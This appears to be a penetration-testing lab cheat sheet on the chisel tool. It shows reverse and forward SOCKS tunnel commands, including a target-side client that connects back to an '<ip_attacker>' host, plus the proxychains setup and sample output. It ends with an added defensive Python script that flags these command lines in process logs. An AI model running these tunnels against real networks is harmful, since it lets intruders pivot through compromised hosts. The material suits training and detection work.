# chisel

### Chisel - Reverse Tunnel

* Attack Host

```bash
./chisel server --reverse

2022/11/06 10:57:00 server: Reverse tunnelling enabled
2022/11/06 10:57:00 server: Fingerprint CelKxt2EsL1SUFnvo634FucIOPqlFKQJi8t/aTjRfWo=
2022/11/06 10:57:00 server: Listening on http://0.0.0.0:8080
```

* Target Host

```shell
C:\Windows\Temp\chisel.exe client <ip_attacker>:8080 R:socks
```

* Verify Listening Port

```shell
dado1513@htb[/htb]$ netstat -lnpt | grep 1080

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:1080          0.0.0.0:*               LISTEN      446306/./chisel

```

* Configure Proxychains

```shell
dado1513@htb[/htb]$ cat /etc/proxychains.conf

<SNIP>

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5  127.0.0.1 1080
```

* Killing Chisel

```powershell
Stop-Process -Name chisel -Force
```

### Target Host as Server

* Target Host

```powershell
PS> C:\Windows\Temp\chisel.exe server --socks5
```

* Attack Host

```shell
dado1513@htb[/htb]$ sudo chisel client 10.129.204.133:8080 socks

2022/11/22 06:56:01 client: Connecting to ws://10.129.204.133:8080
2022/11/22 06:56:01 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/11/22 06:56:02 client: Connected (Latency 124.871246ms)
```
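
Added example (not part of the original notes or the chisel project): a defender-side check that flags the command lines from both sections above in process-creation telemetry, matching on the arguments rather than the file name. The event dictionaries, host names and finding strings are constructed assumptions; only the `server --reverse`, `server --socks5`, `R:socks` and `socks` arguments come from this page.

```python
import re

# First client argument on this page is host:port, e.g. 10.129.204.133:8080
HOSTPORT = re.compile(r"^(?:https?://)?[\w.-]+:\d{1,5}$")
# SOCKS remotes used on this page: "socks" (forward) and "R:socks" (reverse)
SOCKS_REMOTE = re.compile(r"^(R:)?socks$")

def classify(cmdline):
    """Return a finding for a chisel-shaped command line, or None."""
    args = cmdline.split()
    for i in range(1, len(args)):  # args[0] is the image path; match on arguments only
        mode, rest = args[i], args[i + 1:]
        if mode == "server" and "--reverse" in rest:
            return "server: accepts reverse tunnels"
        if mode == "server" and "--socks5" in rest:
            return "server: this host is a SOCKS5 exit"
        if mode == "client" and rest and HOSTPORT.match(rest[0]):
            for remote in rest[1:]:
                m = SOCKS_REMOTE.match(remote)
                if m and m.group(1):
                    return "client: reverse SOCKS, this host is the exit"
                if m:
                    return "client: local SOCKS listener, exit is the server"
    return None

def scan(events):
    """Return (host, finding, cmdline) for every event that matches."""
    hits = []
    for ev in events:
        finding = classify(ev["cmdline"])
        if finding:
            hits.append((ev["host"], finding, ev["cmdline"]))
    return hits

# Constructed process-creation events (host and field names are assumptions).
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": r"C:\Windows\Temp\chisel.exe client 192.0.2.10:8080 R:socks"},
    {"host": "ws02", "cmdline": r"C:\Windows\Temp\chisel.exe server --socks5"},
    {"host": "ws03", "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"host": "lin01", "cmdline": "sudo chisel client 10.129.204.133:8080 socks"},
    {"host": "lin02", "cmdline": "./chisel server --reverse"},
    {"host": "lin03", "cmdline": "python3 server.py --reverse --port 8080"},
    {"host": "lin04", "cmdline": "backup-agent client 192.0.2.20:9000 --verbose"},
]

if __name__ == "__main__":
    for host, finding, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host}: {finding}: {cmdline}")
```

A hit on a workstation or server that has no reason to run a tunnel is worth correlating with a new loopback listener on port 1080, as in the `netstat` output above.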
